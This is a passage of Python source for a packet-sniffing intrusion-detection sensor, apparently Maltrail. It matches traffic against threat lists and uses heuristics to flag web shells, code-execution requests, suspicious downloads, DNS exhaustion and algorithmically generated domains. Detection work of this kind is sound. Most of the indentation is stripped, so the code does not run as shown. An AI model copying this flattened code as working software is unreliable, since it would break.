log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or addr_port(dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(dst_ip, dst_port)
if trail not in trails:
trail = dst_ip
if not any(_ in trails[trail][0] for _ in ("attacker",)) and not ("parking site" in trails[trail][0] and dst_port not in (80, 443)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or addr_port(src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(src_ip, src_port)
if trail not in trails:
trail = src_ip
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
if dst_port in POTENTIAL_INFECTION_PORTS:
key = "%s~%s" % (src_ip, dst_port)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_ip)
_connect_src_details[key].add((sec, usec, src_port, dst_ip))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = get_text(ip_data[h_size:])
if tcp_data.startswith("HTTP/"):
match = re.search(GENERIC_SINKHOLE_REGEX, tcp_data[:2000])
if match:
trail = match.group(0)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
if " HTTP/" in tcp_data:
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif re.search(r"\A\d+\.[0-9.]+\Z", host or "") and re.search(SUSPICIOUS_DIRECT_IP_URL_REGEX, "%s%s" % (host, path)):
                                if not dst_ip.startswith(_get_local_prefix()):  # destination outside the local network
trail = "(%s)%s" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential iot-malware download (suspicious)", "(heuristic)"), packet)
return
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
unquoted_path = _urllib.parse.unquote(path)
key = "code execution"
if key not in _local_cache:
_local_cache[key] = next(_[1] for _ in SUSPICIOUS_HTTP_REQUEST_REGEXES if "code execution" in _[0])
if re.search(_local_cache[key], unquoted_path, re.I) is None: # NOTE: to prevent malware domain FPs in case of outside scanners
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = _urllib.parse.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get((CACHE_TYPE.USER_AGENT, user_agent))
if result is None:
if re.search(WHITELIST_UA_REGEX, user_agent, re.I) is None:
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
unquoted_path = _urllib.parse.unquote(path)
unquoted_post_data = _urllib.parse.unquote(post_data or "")
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
elif post_data:
checks.append("%s?%s" % (path, unquoted_post_data.lower()))
#_ = os.path.splitext(checks[-1]) # causing FPs in cases like elf_mirai - /juno if legit /juno.php is accessed
#if _[1]:
#checks.append(_[0])
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
if '?' not in path and '?' in check and post_data:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, trails[check][0], trails[check][1]))
else:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
match = re.search(r"\bX-Forwarded-For:\s*([0-9.]+)".encode(), packet, re.I)
if match:
src_ip = "%s,%s" % (src_ip, match.group(1))
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.PATH, unquoted_path))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.PATH, unquoted_path)] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.POST_DATA, unquoted_post_data))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.POST_DATA, unquoted_post_data)] = found or ""
if found:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = _urllib.parse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset:offset + 1])
if not length:
query = query[:-1]
break
query += get_text(dns_data[offset + 1:offset + length + 1]) + '.'
offset += length + 1
query = query.lower()
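                        # Editor's note -- worked example of the QNAME walk above: the
                        # wire bytes b"\x03www\x07example\x03com\x00" append "www.",
                        # "example.", "com." in turn; the zero-length terminator then
                        # strips the trailing dot, leaving "www.example.com".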
if not query or re.search(VALID_DNS_NAME_REGEX, query) is None or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2:3]) & 0xfa == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
if re.search(r"bl\b", trail) is None: # generic check for DNSBLs
if not any(_ in subdomains for _ in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if addr_port(dst_ip, dst_port) in trails:
trail = addr_port(dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2:3]) & 0x80: # standard response
if ord(dns_data[3:4]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
                                            if ord(dns_data[_:_ + 1]) & 0xc0 != 0 and ord(dns_data[_ + 2:_ + 3]) == 0x00 and ord(dns_data[_ + 3:_ + 4]) == 0x01:  # Type A (byte-slice comparison keeps Python 2/3 compatibility)
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails and not _check_domain_whitelisted(query):
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3:4]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
if not is_local(dst_ip): # prevent FPs caused by local queries
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec // 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec // 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
trail = "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:])
if not any(subdomain in trail for subdomain in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) == 2 and parts[0] and '-' not in parts[0]:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
                                                probabilities = (float(part.count(c)) / len(part) for c in set(part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
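                                                # Editor's note -- worked example: for part "google" the
                                                # character probabilities are {g: 2/6, o: 2/6, l: 1/6, e: 1/6},
                                                # giving entropy ~1.92 bits, while a DGA-like "q7xza9k2mf" with
                                                # all-distinct characters yields log2(10) ~ 3.32 bits.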
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length:iph_length + 1]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length:iph_length + 1]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1 and not config.profile:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
if not config.no_updates:
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if config.no_updates or retries == CHECK_CONNECTION_MAX_RETRIES:
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails()
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
_ = load_trails()
trails.update(_)
_regex = ""
for trail in trails:
if "static" in trails[trail][1]:
if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
try:
re.compile(trail)
except:
pass
else:
if re.escape(trail) != trail:
index = _regex.count("(?P<g")
if index < 100: # Reference: https://stackoverflow.com/questions/478458/python-regular-expressions-with-more-than-100-groups
_regex += "|(?P<g%s>%s)" % (index, trail)
trails._regex = _regex.strip('|')
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
check_memory()
msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
if os.path.isfile(config.TRAILS_FILE):
mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)
print(msg)
update_timer()
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
                    module = __import__(filename[:-3].encode(sys.getfilesystemencoding()) if six.PY2 else filename[:-3])  # __import__ expects str on Python 3
except (ImportError, SyntaxError) as msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.__name__ = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
for _ in config.pcap_file.split(','):
_caps.append(pcapy.open_offline(_))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if IS_WIN or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and re.sub(r"(?i)\Anetmap:", "", interface) not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and ':' not in config.LOG_SERVER:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
try:
_cap.setfilter(config.CAPTURE_FILTER)
except:
pass
if _multiprocessing:
_init_multiprocessing()
if not IS_WIN and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
def _init_multiprocessing():
"""
    Initializes the worker processes used in multiprocessing mode
"""
global _buffer
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
_ = b"\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER // MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
_n = _multiprocessing.Value('L', lock=False)
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
def monitor():
"""
    Sniffs/monitors the given capture interface(s)
"""
print("[o] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
try:
dlt_offset = DLT_OFFSETS[datalink]
except KeyError:
log_error("Received unexpected datalink (%d)" % datalink, single=True)
return
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in (b"\x00\x21", b"\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif datalink == pcapy.DLT_NULL:
if packet[0:4] in (b"\x02\x00\x00\x00", b"\x23\x00\x00\x00"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == b"\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in (b"\x08\x00", b"\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
if six.PY3: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
sec, usec = [int(_) for _ in ("%.6f" % time.time()).split('.')]
else:
sec, usec = header.getts()
if _multiprocessing:
block = struct.pack("=III", sec, usec, ip_offset) + packet
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, block)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
global _done_count
datalink = _cap.datalink()
if six.PY3: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
def _loop_handler(header, packet):
packet_handler(datalink, header, packet)
_cap.loop(-1, _loop_handler)
else:
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
with _done_lock:
_done_count += 1
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if config.profile and len(_caps) == 1:
print("[=] will store profiling results to '%s'..." % config.profile)
_(_caps[0])
else:
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
time.sleep(1)
print("[i] all capturing interfaces closed")
except SystemError as ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] please wait...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, b"", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
if config.pcap_file:
flush_condensed_events(True)
def main():
for i in xrange(1, len(sys.argv)):
if sys.argv[i] == "-q":
sys.stdout = open(os.devnull, 'w')
if sys.argv[i] == "-i":
